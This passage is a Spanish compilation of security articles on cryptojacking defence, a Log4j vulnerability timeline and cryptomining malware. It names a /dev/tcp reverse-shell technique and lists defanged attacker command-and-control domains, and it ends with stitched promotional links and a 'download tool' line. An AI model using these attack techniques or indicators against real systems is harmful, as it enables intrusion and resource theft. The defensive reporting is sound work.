CoinStop es otra campaña de criptojacking descubierta recientemente que ataca a proveedores de servicios en la nube (CSP) asiáticos. Esta se distinguió por sus medidas de antiforense y evasión. Estas incluían el timestomping para manipular las marcas de tiempo del sistema, la eliminación de las políticas criptográficas del sistema y el uso del archivo de dispositivo /dev/tcp para crear una sesión de shell inversa, explicó Muir, de Cado, en un informe sobre el ataque.

Granja de criptomonedas encontrada en un almacén

Los criptojackers a veces pueden llegar a grandes extremos para robar no solo potencia de procesamiento, sino también energía y recursos de red de la infraestructura corporativa. El año pasado, los analistas de Darktrace destacaron un ejemplo anónimo de uno de sus clientes en el que descubrieron una granja de criptominería en un almacén que estaba disfrazada dentro de un conjunto de cajas de cartón aparentemente inofensivas. Dentro había un equipo sigiloso con múltiples GPU conectadas a la red eléctrica de la empresa,

Cómo prevenir el criptojacking

Dado que ha evolucionado hasta convertirse en un ataque multivectorial que abarca recursos de endpoints, servidores y nube, prevenir el criptojacking requiere una estrategia de defensa orquestada y completa. Los siguientes pasos pueden ayudar a evitar que el criptojacking se descontrole en los recursos empresariales.

Emplee una protección sólida de endpoints: La base de esto es utilizar protección de endpoints y antimalware capaz de detectar criptomineros, así como mantener los filtros web actualizados y gestionar las extensiones del navegador para minimizar el riesgo de que se ejecuten scripts basados en navegador. Las organizaciones deberían buscar idealmente plataformas de protección de endpoints que puedan extenderse a servidores y más allá.

Parchee y endurezca los servidores (y todo lo demás). Los criptojackers tienden a buscar la fruta más fácil de alcanzar que puedan cosechar silenciosamente—eso incluye escanear en busca de servidores expuestos públicamente con vulnerabilidades antiguas. El endurecimiento básico de servidores, que incluye aplicar parches, desactivar servicios no utilizados y limitar las huellas externas, puede contribuir en gran medida a minimizar el riesgo de ataques basados en servidores.

Utilice el análisis de composición de software. Las herramientas de análisis de composición de software (SCA) proporcionan una mejor visibilidad de qué componentes se utilizan dentro del software para prevenir ataques de cadena de suministro que aprovechan scripts de minería de criptomonedas.

Busque las configuraciones incorrectas en la nube. Una de las formas más impactantes en que las organizaciones pueden detener el criptojacking en la nube es endureciendo las configuraciones de la nube y de los contenedores. Eso significa encontrar servicios en la nube expuestos a Internet público sin la autenticación adecuada, eliminar servidores API expuestos y eliminar credenciales y otros secretos almacenados en entornos de desarrollo o integrados directamente en las aplicaciones.

Cómo detectar el criptojacking

El criptojacking es un ciberataque clásico de tipo «lento y sigiloso» diseñado para dejar señales mínimas y evitar la detección a largo plazo. Si bien las plataformas de protección de endpoints y las tecnologías de detección y respuesta de endpoints han avanzado mucho en la alerta de ataques de criptojacking, los delincuentes son maestros de la evasión en este frente y detectar mineros ilícitos de criptomonedas aún puede resultar difícil, especialmente cuando solo unos pocos sistemas están comprometidos. Los siguientes son algunos métodos adicionales para detectar señales de criptojacking.

Capacite a su mesa de ayuda para que busque señales de criptominería. A veces, la primera indicación en los endpoints de los usuarios es un aumento en las quejas a la mesa de ayuda sobre el rendimiento lento de las computadoras. Eso debería ser una bandera roja para investigar más a fondo, al igual que los dispositivos que se sobrecalientan o el bajo rendimiento de la batería en los dispositivos móviles.

Implemente una solución de monitoreo de red. Las herramientas de monitoreo de red pueden ofrecer un poderoso medio para detectar los tipos de tráfico web y tráfico C2 saliente que indican actividad de criptojacking, sin importar el dispositivo del que provengan.

«Si tiene un buen filtrado de salida en un servidor donde esté vigilando el inicio de conexiones salientes, esa puede ser una buena detección de [malware de criptominería]», ]», dice Travis Farral, vicepresidente y CISO de Archaea Energy. No obstante, advierte que los autores de criptomineros pueden escribir su malware para evitar ese método de detección.

Utilice monitoreo en la nube y seguridad en tiempo de ejecución de contenedores. Las herramientas en evolución, como el monitoreo en la nube y el escaneo de seguridad en tiempo de ejecución de contenedores, pueden ofrecer visibilidad adicional en los entornos de nube que puedan verse afectados por criptomineros no autorizados. Los proveedores de nube están integrando este tipo de visibilidad en sus servicios, a veces como complementos. Por ejemplo, Google Cloud amplió su Security Command Center a principios de este año para incluir lo que denomina Virtual Machine Threat Detection (VMTD) y así detectar señales de criptominería en la nube, entre otras amenazas en la nube.

Realice búsquedas de amenazas periódicas. Dado que muchos ataques de criptojacking son sigilosos y dejan pocos rastros, las organizaciones pueden necesitar tomar medidas más activas, como la búsqueda de amenazas, para buscar regularmente señales sutiles de compromiso y llevar a cabo investigaciones.

«Los equipos de seguridad de endpoints y de SOC deberían invertir tiempo en ejercicios activos y búsquedas de amenazas en lugar de esperar a que ocurra algo potencialmente catastrófico», dice Vincent, de LogRhythm.

Monitoree sus sitios web en busca de código de criptominería. Farral advierte que los criptojackers están encontrando formas de colocar fragmentos de código JavaScript en los servidores web. «El servidor en sí no es el objetivo, sino cualquier persona que visite el sitio web [corre el riesgo de infectarse]», dice. Recomienda monitorear regularmente los cambios de archivos en el servidor web o los cambios en las propias páginas.

Cómo responder a un ataque de criptojacking

Una vez detectada la actividad ilícita de criptominería, responder a un ataque de criptojacking debe seguir los pasos estándar de respuesta a incidentes cibernéticos, que incluyen contención, erradicación, recuperación y lecciones aprendidas. Algunos consejos para responder a un ataque de criptojacking incluyen:

Detenga los scripts distribuidos a través de la web. Para los ataques de JavaScript en el navegador, la solución es simple una vez que se detecta la criptominería: cierre la pestaña del navegador que ejecuta el script. El departamento de TI debe anotar la URL del sitio web que es la fuente del script y actualizar los filtros web de la empresa para bloquearla.

Apague las instancias de contenedores comprometidas. La infraestructura de nube inmutable, como las instancias de contenedores comprometidas con mineros de criptomonedas, también se puede manejar de forma simple apagando las instancias de contenedores infectadas y comenzando de nuevo. Sin embargo, las organizaciones deben investigar las causas raíz que llevaron al compromiso del contenedor en primer lugar. Esto significa buscar señales de que el panel de control y las credenciales del contenedor han sido comprometidos y examinar los recursos de nube conectados en busca de señales de compromiso. Un paso clave es asegurarse de que la nueva imagen de contenedor que reemplace a la anterior no esté configurada de manera similar.

Reduzca los permisos y regenere las claves de API. Erradicar y recuperarse por completo del criptojacking basado en la nube requerirá que las organizaciones reduzcan los permisos en los recursos de nube afectados (y en los conectados a ellos) y regeneren las claves de API para evitar que los atacantes vuelvan a entrar directamente en el mismo entorno de nube.

Aprenda y adáptese. Use la experiencia para comprender mejor cómo el atacante pudo comprometer sus sistemas. Actualice la formación de sus usuarios, mesa de ayuda, TI y analistas de SOC para que estén mejor preparados para identificar intentos de criptojacking y responder en consecuencia.

Nota del editor: Este artículo, publicado originalmente en febrero de 2018, ha sido actualizado para incluir nuevas investigaciones, mejores prácticas y ejemplos de criptojacking.


Las vulnerabilidades de Apache Log4j: Una cronología

La vulnerabilidad de Apache Log4j ha afectado a organizaciones de todo el mundo. Aquí hay una cronología de los eventos clave en torno al exploit de Log4j a medida que se han desarrollado.

La vulnerabilidad de Apache Log4j ha sido titular en todo el mundo desde que se descubrió a principios de diciembre. La falla ha afectado a una gran cantidad de organizaciones en todo el mundo mientras los equipos de seguridad se apresuraban a mitigar los riesgos asociados. Aquí hay una cronología de los eventos clave en torno a la vulnerabilidad de Log4j a medida que se han desarrollado.

Jueves 9 de diciembre: Se descubre el exploit de día cero de Apache Log4j

Apache publicó detalles sobre una vulnerabilidad crítica en Log4j, una biblioteca de registro utilizada en millones de aplicaciones basadas en Java. Los atacantes comenzaron a explotar la falla (CVE-2021-44228) – denominada «Log4Shell», que fue calificada con 10 sobre 10 en la escala de calificación de vulnerabilidades CVSS. Podría conducir a la ejecución remota de código (RCE) en los servidores subyacentes que ejecutan aplicaciones vulnerables. «Un atacante que pueda controlar los mensajes de registro o los parámetros de los mensajes de registro puede ejecutar código arbitrario cargado desde servidores LDAP cuando la sustitución de búsqueda de mensajes está habilitada», escribieron los desarrolladores de Apache en un aviso. Se puso a disposición una corrección para el problema con el lanzamiento de Log4j 2.15.0, mientras los equipos de seguridad de todo el mundo trabajaban para proteger sus organizaciones. Se instó a las empresas a instalar la versión más reciente.

Viernes 10 de diciembre: El NCSC del Reino Unido emite una advertencia sobre Log4j a las organizaciones británicas

A medida que continuaban las consecuencias de la vulnerabilidad, el Centro Nacional de Seguridad Cibernética (NCSC) del Reino Unido emitió una advertencia pública a las empresas británicas sobre la falla y describió estrategias de mitigación. El NCSC recomendó a todas las organizaciones instalar la última actualización de inmediato donde se supiera que se usaba Log4j. «Esta debería ser la primera prioridad para todas las organizaciones del Reino Unido que utilizan software que se sabe que incluye Log4j. Las organizaciones deben actualizar tanto el software orientado a Internet como el que no lo está», decía el comunicado. También se instó a las empresas a buscar instancias desconocidas de Log4j e implementar monitoreo/bloqueo de red protector.

Sábado 11 de diciembre: El director de CISA comenta sobre el «desafío urgente para los defensores de redes»

Al igual que el NCSC del Reino Unido, la Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) de EE. UU. respondió públicamente a la vulnerabilidad de Log4j, y su directora, Jen Easterly, reflexionó sobre el desafío urgente que presentaba para los defensores de redes. «CISA está trabajando estrechamente con nuestros socios de los sectores público y privado para abordar de manera proactiva una vulnerabilidad crítica que afecta a los productos que contienen la biblioteca de software Log4j», dijo en un comunicado. «Estamos tomando medidas urgentes para impulsar la mitigación de esta vulnerabilidad y detectar cualquier actividad de amenaza asociada. Hemos agregado esta vulnerabilidad a nuestro catálogo de vulnerabilidades explotadas conocidas, lo que obliga a las agencias civiles federales – y señala a los socios no federales – a parchear o remediar urgentemente esta vulnerabilidad. Nos estamos comunicando de manera proactiva con las entidades cuyas redes pueden ser vulnerables y estamos aprovechando nuestras herramientas de escaneo y detección de intrusiones para ayudar a los socios gubernamentales y de la industria a identificar la exposición o explotación de la vulnerabilidad».

CISA recomendó a los propietarios de activos tomar tres medidas adicionales e inmediatas para ayudar a mitigar la vulnerabilidad:

  • Enumerar cualquier dispositivo orientado al exterior que tenga Log4j instalado
  • Asegurarse de que los centros de operaciones de seguridad actúen sobre cada alerta en los dispositivos que caen en la categoría anterior
  • Instalar un firewall de aplicaciones web con reglas que se actualicen automáticamente para que los centros de operaciones de seguridad (SOC) puedan concentrarse en menos alertas

Martes 14 de diciembre: Se detecta una segunda vulnerabilidad de Log4j con amenaza de denegación de servicio y se publica un nuevo parche

Se descubrió una segunda vulnerabilidad que afecta a Apache Log4j. El nuevo exploit, CVE 2021-45046, permitía a los actores maliciosos crear datos de entrada maliciosos utilizando un patrón de búsqueda JNDI para crear ataques de denegación de servicio (DoS), según la descripción de CVE. Se puso a disposición un nuevo parche para el exploit que eliminó el soporte para patrones de búsqueda de mensajes y deshabilitó la funcionalidad JNDI de forma predeterminada, ya que la corrección de Log4j 2.15.0 para la falla original estaba incompleta en ciertas configuraciones no predeterminadas.

«Si bien CVE-2021-45046 es menos grave que la vulnerabilidad original, se convierte en otro vector para que los actores de amenazas realicen ataques maliciosos contra sistemas sin parchear o mal parcheados», dijo Amy Chang, jefa de riesgo y respuesta en Resilience, a CSO poco después de que se descubriera la falla. «El parche incompleto de CVE-2021-44228 podría ser explotado para crear datos de entrada maliciosos, lo que podría resultar en un ataque de DoS. Un ataque de DoS puede apagar una máquina o red y hacerla inaccesible para sus usuarios previstos», agregó. Se recomendó a las organizaciones actualizar a Log4j: 2.16.0 lo antes posible.

Viernes 17 de diciembre: Se revela una tercera vulnerabilidad de Log4j y se pone a disposición una nueva corrección

Apache publicó detalles de una tercera vulnerabilidad importante de Log4j y puso a disposición otra corrección más. Esta era una falla de recursión infinita calificada con 7.5 sobre 10. «El equipo de Log4j ha sido informado de una vulnerabilidad de seguridad, CVE-2021-45105, que ha sido abordada en Log4j 2.17.0 para Java 8 en adelante», escribió. «Las versiones 2.0-alpha1 a 2.16.0 de Apache Log4j2 no protegían contra la recursión descontrolada de búsquedas autorreferenciales. Cuando la configuración de registro utiliza un Pattern Layout no predeterminado con una Context Lookup (por ejemplo, $${ctx:loginId}), los atacantes con control sobre los datos de entrada del Thread Context Map (MDC) pueden crear datos de entrada maliciosos que contienen una búsqueda recursiva, lo que resulta en un StackOverflowError que terminará el proceso. Esto también se conoce como un ataque de DoS (denegación de servicio)».

Apache también describió las siguientes mitigaciones:

  • En PatternLayout de la configuración de registro, reemplace las Context Lookups como ${ctx:loginId}o $${ctx:loginId} con patrones de Thread Context Map (%X, %mdc o %MDC)
  • De lo contrario, en la configuración, elimine las referencias a Context Lookups como ${ctx:loginId} o $${ctx:loginId} cuando se originen de fuentes externas a la aplicación, como encabezados HTTP o entrada del usuario

Lunes 20 de diciembre: Log4j explotado para instalar Dridex y Meterpreter

El grupo de investigación en ciberseguridad Cryptolaemus advirtió que la vulnerabilidad de Log4j estaba siendo explotada para infectar dispositivos Windows con el troyano bancario Dridex y dispositivos Linux con Meterpreter. Dridex es una forma de malware que roba credenciales bancarias a través de un sistema que utiliza macros de Microsoft Word, mientras que Meterpreter es una carga útil de ataque de Metasploit que proporciona un shell interactivo desde el cual un atacante puede explorar una máquina objetivo y ejecutar código. Joseph Roosen, miembro de Cryptolaemus, dijo a BleepingComputer que los actores de amenazas utilizan la variante de exploit RMI (Invocación de Métodos Remotos) de Log4j para forzar a los dispositivos vulnerables a cargar y ejecutar una clase Java desde un servidor remoto controlado por el atacante.

Miércoles 22 de diciembre: Los datos muestran que el 10 % de todos los activos son vulnerables a Log4Shell

Los datos publicados por el proveedor de ciberseguridad Tenable revelaron que uno de cada 10 activos era vulnerable a Log4Shell, mientras que el 30 % de las organizaciones no había comenzado a escanear en busca del fallo. «De los activos que se han evaluado, Log4Shell se ha encontrado en aproximadamente el 10 % de ellos, incluida una amplia gama de servidores, aplicaciones web, contenedores y dispositivos IoT», decía una publicación en el blog de Tenable. «Log4Shell es omnipresente en todas las industrias y geografías. Uno de cada 10 servidores corporativos expuestos. Una de cada 10 aplicaciones web, y así sucesivamente. Uno de cada 10 de casi todos los aspectos de nuestra infraestructura digital tiene el potencial de explotación maliciosa a través de Log4Shell».

El proveedor advirtió que Log4Shell conlleva una amenaza potencial mayor que EternalBlue (explotado en los ataques de WannaCry) debido a la omnipresencia de Log4j tanto en la infraestructura como en las aplicaciones. «Ninguna vulnerabilidad en la historia ha exigido tan abiertamente una remediación. Log4Shell definirá la informática tal como la conocemos, separando a quienes se esfuerzan por protegerse de quienes se sienten cómodos siendo negligentes», agregó.

Martes 4 de enero: La FTC dice a las empresas que parcheen la vulnerabilidad de Log4j y amenaza con acciones legales

La Comisión Federal de Comercio (FTC) instó a las organizaciones estadounidenses a aplicar el parche para la vulnerabilidad Log4Shell de inmediato o arriesgarse a enfrentar acciones punitivas por parte de la agencia. «Cuando se descubren y explotan vulnerabilidades, se corre el riesgo de pérdida o violación de información personal, pérdidas financieras y otros daños irreversibles. El deber de tomar medidas razonables para mitigar vulnerabilidades de software conocidas implica leyes que incluyen, entre otras, la Ley de la Comisión Federal de Comercio y la Ley Gramm-Leach-Bliley», dijo la FTC. Añadió que es fundamental que las empresas y sus proveedores que dependen de Log4j actúen ahora para reducir la probabilidad de daños a los consumidores y evitar acciones legales de la FTC. «La FTC tiene la intención de utilizar toda su autoridad legal para perseguir a las empresas que no tomen medidas razonables para proteger los datos de los consumidores contra la exposición como resultado de Log4j, o de vulnerabilidades conocidas similares en el futuro».

Lunes, 10 de enero: Microsoft advierte sobre un operador de ransomware con sede en China que explota Log4Shell

Microsoft actualizó su página de guía sobre la vulnerabilidad Log4j con detalles de un operador de ransomware con sede en China (DEV-0401) que apunta a sistemas expuestos a internet y despliega el ransomware NightSky. «Desde el 4 de enero, los atacantes comenzaron a explotar la vulnerabilidad CVE-2021-44228 en sistemas expuestos a internet que ejecutan VMware Horizon», escribió. «DEV-0401 ha desplegado previamente múltiples familias de ransomware, incluyendo LockFile, AtomSilo y Rook, y ha explotado de manera similar sistemas expuestos a internet que ejecutan Confluence (CVE-2021-26084) y servidores Exchange locales (CVE-2021-34473)». Según el análisis de Microsoft, se descubrió que los atacantes utilizaban servidores de comando y control (CnC) que suplantan dominios legítimos. Estos incluyen service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net y 139[.]180[.]217[.]203.


Seguridad 101: El impacto del malware de minería de criptomonedas

El gobierno australiano acaba de reconocer la moneda digital como un método de pago legal. Desde el 1 de julio, las compras realizadas con monedas digitales como bitcoin están exentas del Impuesto sobre Bienes y Servicios del país para evitar la doble tributación. Por lo tanto, los comerciantes e inversores no pagarán impuestos por comprarlas y venderlas a través de plataformas de intercambio legales.

Japón, que legitimó bitcoin como forma de pago en abril pasado, ya espera que más de 20.000 comerciantes acepten pagos con bitcoin. Otros países se están sumando a la tendencia, aunque parcialmente: empresas y algunas organizaciones públicas en Suiza, Noruega y los Países Bajos. En un estudio reciente, los usuarios activos únicos de billeteras de criptomonedas se estiman entre 2,9 y 5,8 millones, la mayoría de los cuales se encuentran en América del Norte y Europa. 

¿Pero qué tiene que ver la aceptación y adopción de las monedas digitales con las amenazas en línea? Mucho, en realidad. A medida que criptomonedas como bitcoin ganan terreno en el mundo real, también lo harán las amenazas cibercriminales que abusan de ella. Pero, ¿cómo exactamente? ¿Qué significa esto para las empresas y los usuarios comunes?

¿Qué es la criptomoneda?

La criptomoneda es una cadena de datos cifrados que denota una unidad de moneda. Es monitoreada y organizada por una red peer-to-peer también conocida como blockchain, que también sirve como un libro de contabilidad seguro de transacciones, por ejemplo, compra, venta y transferencia. A diferencia del dinero físico, las criptomonedas están descentralizadas, lo que significa que no son emitidas por gobiernos u otras instituciones financieras. 

Las criptomonedas se crean (y aseguran) mediante algoritmos criptográficos que se mantienen y confirman en un proceso llamado minería, donde una red de computadoras o hardware especializado como los circuitos integrados de aplicación específica (ASIC) procesan y validan las transacciones. El proceso incentiva a los mineros que operan la red con la criptomoneda.

Bitcoin no lo es todo

En realidad hay más de 700 criptomonedas, pero solo algunas se negocian fácilmente y aún menos tienen una capitalización de mercado superior a los 100 millones de dólares. Bitcoin, por ejemplo, fue creado por Satoshi Nakamoto (seudónimo) y lanzado en 2009 como código abierto. La tecnología blockchain hizo que todo funcionara, proporcionando un sistema donde las estructuras de datos (bloques) se transmiten, validan y registran en una base de datos pública y distribuida a través de una red de puntos de comunicación (nodos). 

Si bien bitcoin es la criptomoneda más famosa, hay otras alternativas populares. Ethereum llevó los «contratos inteligentes» un paso más allá al hacer que los lenguajes de programación necesarios para codificarlos fueran más accesibles para los desarrolladores. Los acuerdos, o transacciones condicionales/si-entonces, se escriben como código y se ejecutan (siempre que se cumplan los requisitos) en la blockchain de Ethereum. 

Ethereum, sin embargo, ganó notoriedad después de que un hacker explotara una vulnerabilidad en la Organización Autónoma Digital (DAO) que se ejecuta en el software de Ethereum, desviando ether por valor de 50 millones de dólares estadounidenses (la moneda de Ethereum). Esto resultó en el desarrollo de Ethereum Classic, basado en la blockchain original, y Ethereum, su versión mejorada (mediante un hard fork).

También hay otras criptomonedas notables: Litecoin, Dogecoin, Monero. Litecoin es una supuesta mejora técnica de Bitcoin que es capaz de realizar transacciones más rápidas gracias a su algoritmo de minería Scrypt (Bitcoin utiliza SHA-256). La red Litecoin es capaz de producir 84 millones de litecoins, cuatro veces más unidades de criptomoneda que las emitidas por Bitcoin. Monero es notable por su uso de firmas de anillo (un tipo de firma digital) y del protocolo de capa de aplicación CryptoNote para proteger la privacidad de sus transacciones: monto, origen y destino. Dogecoin, que fue desarrollado inicialmente con fines educativos o de entretenimiento, estaba destinado a un grupo demográfico más amplio. Capaz de generar dogecoins sin límite, también utiliza Scrypt para impulsar la moneda.

La minería de criptomonedas también atrajo la atención de los ciberdelincuentes

Las criptomonedas no tienen fronteras: cualquiera puede enviarlas en cualquier momento y lugar, sin demoras ni cargos adicionales u ocultos de intermediarios. Debido a su naturaleza, están más seguras contra el fraude y el robo de identidad, ya que las criptomonedas no pueden falsificarse y la información personal está detrás de un muro criptográfico. 

Desafortunadamente, la misma aparente rentabilidad, conveniencia y seudonimato de las criptomonedas también las hizo ideales para los ciberdelincuentes, como lo demostraron los operadores de ransomware. La creciente popularidad de las criptomonedas coincide con las incidencias de malware que infecta sistemas y dispositivos, convirtiéndolos en ejércitos de máquinas de minería de criptomonedas. 

La minería de criptomonedas es una tarea computacionalmente intensiva que requiere recursos significativos de procesadores dedicados, tarjetas gráficas y otro hardware. Si bien la minería genera dinero, hay muchas salvedades. La ganancia es relativa a la inversión del minero en el hardware, sin mencionar los costos de electricidad necesarios para su funcionamiento. 

Las criptomonedas se minan en bloques; en bitcoin, por ejemplo, cada vez que se resuelven cierto número de hashes, la cantidad de bitcoins que se puede otorgar al minero por bloque se reduce a la mitad. Dado que la red de bitcoin está diseñada para generar la criptomoneda cada 10 minutos, la dificultad de resolver otro hash se ajusta. Y a medida que el poder de minería aumenta, el requisito de recursos para minar un nuevo bloque se acumula. Los pagos son relativamente pequeños y eventualmente disminuyen cada cuatro años: en 2016, la recompensa por minar un bloque se redujo a la mitad a 12,5 BTC (o 32.000 dólares al 5 de julio de 2017). En consecuencia, muchos se unen en pools para hacer la minería más eficiente. Las ganancias se dividen entre el grupo, dependiendo del esfuerzo que haya realizado cada minero.

El malware de minería de criptomonedas utiliza vectores de ataque similares

Los malhechores recurren al uso de malware para sortear estos desafíos. Sin embargo, hay una advertencia para los mineros cibercriminales: los dispositivos y máquinas conectados a internet, aunque son lo suficientemente rápidos para procesar datos de red, no tienen amplias capacidades de cómputo numérico. Para compensar esto, el malware de minería de criptomonedas está diseñado para zombificar botnets de computadoras para realizar estas tareas. Otros prescindieron de la sutileza por completo: en 2014, el clúster de supercomputadoras Odyssey de Harvard fue utilizado para minar dogecoins ilícitamente. Durante el mismo año, un incidente similar ocurrió con las supercomputadoras de la Fundación Nacional de Ciencias de EE. UU. A principios de febrero de 2017, uno de los servidores de la Reserva Federal de EE. UU. fue utilizado indebidamente para minar bitcoins. 

El malware de minería de criptomonedas emplea el mismo modus operandi que muchas otras amenazas, desde correos spam cargados de malware y descargas desde URL maliciosas hasta junkware y aplicaciones potencialmente no deseadas (PUA). En enero de 2014, se explotó una vulnerabilidad en la red de anuncios basada en Java de Yahoo!, exponiendo a los usuarios finales europeos a malvertisements que entregaban un malware de minería de bitcoins. Un mes antes, las autoridades alemanas arrestaron a hackers por presuntamente usar malware para minar bitcoins por valor de más de 954.000 dólares.

Hemos visto la aparición de herramientas de hacking y backdoors relacionados con la minería cibercriminal de bitcoins ya en 2011, y desde entonces hemos visto una variedad de amenazas de minería de criptomonedas que agregan más capacidades, como la denegación de servicio distribuida y la suplantación de URL. Otra incluso intentó hacerse pasar por un componente de uno de los productos de Trend Micro. En 2014, la amenaza se trasladó a los dispositivos Android como Kagecoin, capaz de minar bitcoin, litecoin y dogecoin. Un troyano de acceso remoto (RAT) njrat/Njw0rm, ampliamente compartido en el underground de Oriente Medio fue modificado para agregar funcionalidad de minería de bitcoins. Lo mismo se hizo con un antiguo RAT de Java que puede minar litecoin. 

Hasta ahora, los malware notables de minería de criptomonedas de este año son Adylkuzz, CPUMiner/EternalMiner y Linux.MulDrop.14. Todos explotan vulnerabilidades. Adylkuzz aprovecha EternalBlue, la misma falla de seguridad que el ransomware WannaCry usó con efectos destructivos, mientras que CPUMiner/EternalMiner usó SambaCry, una vulnerabilidad en el paquete de software de interoperabilidad Samba. Linux.MulDrop.14, un troyano de Linux, apunta a dispositivos Raspberry Pi. Estas amenazas infectaron dispositivos y máquinas y los convirtieron en botnets de minería de monero.

El impacto del malware de minería de criptomonedas lo convierte en una amenaza creíble

El malware de minería de criptomonedas roba los recursos de las máquinas infectadas, afectando significativamente su rendimiento y aumentando su desgaste. Una infección también implica otros costos, como un mayor consumo de energía. 

Pero también hemos descubierto que su impacto va más allá de los problemas de rendimiento. Del 1 de enero al 24 de junio de 2017, nuestros sensores detectaron 4.894 mineros de bitcoins que desencadenaron más de 460.259 actividades de minería de bitcoins, y descubrieron que más del 20% de estos mineros también desencadenaron ataques web y basados en red. Incluso encontramos intentos de intrusión vinculados al vector de ataque de un ransomware. Los ataques más prevalentes que observamos fueron:

  • Cross-site scripting
  • Explotación de una vulnerabilidad de ejecución remota de código en el Servidor de Información de Internet de Microsoft (IIS)
  • Ataques/inicios de sesión por fuerza bruta y contraseñas predeterminadas
  • Explotaciones de desbordamiento de búfer de comandos
  • Inyección de código arbitrario en Hypertext Preprocessor (PHP)
  • Inyección SQL
  • Ataque de denegación de servicio BlackNurse 

Estos malware pueden amenazar la disponibilidad, integridad y seguridad de una red o sistema, lo que potencialmente puede resultar en interrupciones de las operaciones críticas de una empresa. El robo de información y el secuestro del sistema también son repercusiones preocupantes. Estos ataques también pueden ser el conducto a través del cual se distribuye malware adicional. 

Los dispositivos de Internet de las Cosas (IoT) también están en el punto de mira del malware de minería de criptomonedas, desde grabadores de video digitales (DVR)/cámaras de vigilancia, decodificadores, dispositivos de almacenamiento conectado a la red (NAS) y especialmente routers, dada su ubicuidad en entornos domésticos y corporativos. En abril de 2017, una variante de Mirai surgió con capacidades de minería de bitcoins. La notoriedad de Mirai surgió de la devastación que causó en los dispositivos IoT, particularmente en los routers domésticos, utilizándolos para dejar fuera de línea sitios de alto perfil el año pasado. Durante los primeros tres trimestres de 2016, detectamos un ejército zombie de minería de bitcoins compuesto por sistemas Windows, routers domésticos y cámaras IP. 

Del 1 de enero al 24 de junio de 2017, también observamos diferentes tipos de dispositivos que estaban minando bitcoin, aunque nuestra telemetría no puede verificar si estas actividades estaban autorizadas. También vimos que las actividades de minería de bitcoins aumentaron un 40%, de 1.800 eventos diarios desencadenados en febrero a 3.000 en marzo de 2017. 

Si bien la minería de bitcoins no es inherentemente ilegal (al menos en muchos países), puede implicar un compromiso si no cuenta con el conocimiento y consentimiento del propietario. Descubrimos que las máquinas con Windows registraron la mayor cantidad de actividades de minería de bitcoins, pero también son dignos de mención:

  • Equipos con sistemas operativos Macintosh, incluido iOS (iPhone 4 a iPhone 7)
  • Dispositivos que ejecutan Ubuntu OS, un derivado del sistema operativo Debian Linux
  • Routers domésticos
  • Dispositivos de monitoreo ambiental, utilizados en centros de datos
  • Smart TVs y dispositivos móviles con Android
  • Cámaras IP
  • Servidores de impresión
  • Consolas de juegos

[LEER: Cómo proteger tu router contra Mirai y los ataques a redes domésticas]

El malware de minería de criptomonedas puede convertir a las víctimas en parte del problema

El malware de minería de criptomonedas puede deteriorar el rendimiento del sistema y exponer a los usuarios finales y a las empresas al robo de información, al secuestro y a una plétora de otros malware. Y al convertir estas máquinas en zombies, el malware de criptomonedas puede incluso hacer inadvertidamente que sus víctimas sean parte del problema. 

De hecho, su impacto adverso en los dispositivos que infectan —y en última instancia en los activos de una empresa o los datos de un usuario— los convierte en una amenaza creíble. No existe una bala de plata para estos malware, pero se pueden mitigar siguiendo estas mejores prácticas:

  • Actualizar regularmente tu dispositivo con los últimos parches ayuda a evitar que los atacantes utilicen vulnerabilidades como puertas de entrada a los sistemas
  • Cambiar o fortalecer las credenciales predeterminadas del dispositivo lo hace menos propenso a accesos no autorizados
  • Habilitar el cortafuegos del dispositivo (para routers domésticos), si está disponible, o implementar sistemas de detección y prevención de intrusiones para mitigar intentos de incursión
  • Tener precaución contra vectores de ataque conocidos: enlaces de ingeniería social, archivos adjuntos o ficheros de sitios web sospechosos, software/aplicaciones de terceros dudosos y correos electrónicos no solicitados 

Los administradores de TI/sistemas y los profesionales de la seguridad de la información también pueden considerar listas blancas de aplicaciones o mecanismos de seguridad similares que impidan que ejecutables sospechosos se ejecuten o se instalen. Monitorear proactivamente el tráfico de red ayuda a identificar mejor las señales de alerta que pueden indicar una infección de malware. Aplicar el principio de privilegio mínimo, desarrollar contramedidas contra inyecciones web, asegurar la puerta de enlace de correo electrónico, implementar mejores prácticas para dispositivos móviles corporativos y cultivar una fuerza laboral consciente de la ciberseguridad son parte de un enfoque de defensa en profundidad para reducir la exposición de una empresa a estas amenazas. Sin embargo, en última instancia, la seguridad de los dispositivos conectados a Internet contra el malware de minería de criptomonedas no es solo una carga para sus usuarios. Los fabricantes de diseño original y de equipos también desempeñan funciones vitales para asegurar los ecosistemas en los que operan.

Explotación en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4jhttps://cryptodeeptech.ru/blockchain-attack-vectors/

La mayoría no es suficiente: la minería de Bitcoin es vulnerable

Explotación en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4jhttps://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf

GitHub

Telegram: https://t.me/cryptodeeptech

Vídeo: https://youtu.be/PNDBjoT83zA

Fuente: https://cryptodeeptech.ru/log4j-vulnerability


Explotación en el código de minería de criptomonedas que utilizó una peligrosa vulnerabilidad Log4j

Descargar herramienta